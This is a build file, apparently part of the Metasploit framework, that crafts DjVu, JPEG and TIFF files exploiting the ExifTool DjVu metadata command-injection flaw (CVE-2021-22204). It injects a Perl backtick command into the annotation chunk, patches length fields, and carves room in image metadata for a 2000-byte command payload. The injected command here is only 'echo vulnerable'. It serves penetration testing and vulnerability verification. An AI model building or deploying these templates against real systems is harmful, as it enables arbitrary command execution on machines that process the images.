data/exploits/CVE-2021-22204/Makefile
.PHONY: all clean msf.djvu msf.jpg msf.tif
all: msf.djvu msf.jpg msf.tif
clean:
rm -f msf.djvu msf.jpg msf.tif
msf.djvu:
curl -L https://github.com/exiftool/exiftool/raw/ca8685788f5763c547349f239764bd19cf1952da/t/images/DjVu.djvu -o $@
djvused -f set_author.dsed -s $@
# Rewrite the ANT section as uncompressed data with an 'echo vulnerable' payload
perl -0777 -pi -e 's!DJVIANTz.*!DJVIANTa\x00\x00\x00\x39(metadata (Author "\\c\@{[`echo vulnerable > /dev/tty`]}"))!s;' msf.djvu
# Fix up some length fields
perl -e 'print "\x00\x00\x00\xeb"' | dd of=$@ bs=1 seek=8 count=4 conv=notrunc
perl -e 'print "\x00\x00\x00\x45"' | dd of=$@ bs=1 seek=174 count=4 conv=notrunc
# Test the file
djvudump $@
msf.jpg:
curl -L https://github.com/exiftool/exiftool/raw/a2500333f845b303b86013110651d219e193d3eb/t/images/Writer.jpg -o $@
# Scrub the file
exiftool -overwrite_original -all= $@
# Create a cave big enough for the djvu template plus a 2000 byte CMD payload
exiftool -overwrite_original -processingsoftware=$$(perl -e 'print "z"x2221') $@
# Change the 'Processing Software' field to a HasselbladExif field
sed -i 's/\x00\x0b/\xc5\x1b/' $@
msf.tif:
curl -L https://github.com/exiftool/exiftool/raw/a2500333f845b303b86013110651d219e193d3eb/t/images/ExifTool.tif -o $@
# Scrub the file
exiftool -overwrite_original -all= $@
# Selectively scrub IFD0 fields
exiftool -overwrite_original -ImageDescription= -Make= -Model= -Software= -ModifyDate= $@
# Create a cave big enough for the djvu template plus a 2000 byte CMD payload
exiftool -overwrite_original -processingsoftware=$$(perl -e 'print "z"x2221') $@
# Change the 'Processing Software' field to a HasselbladExif field
sed -i 's/\x00\x0b/\xc5\x1b/' $@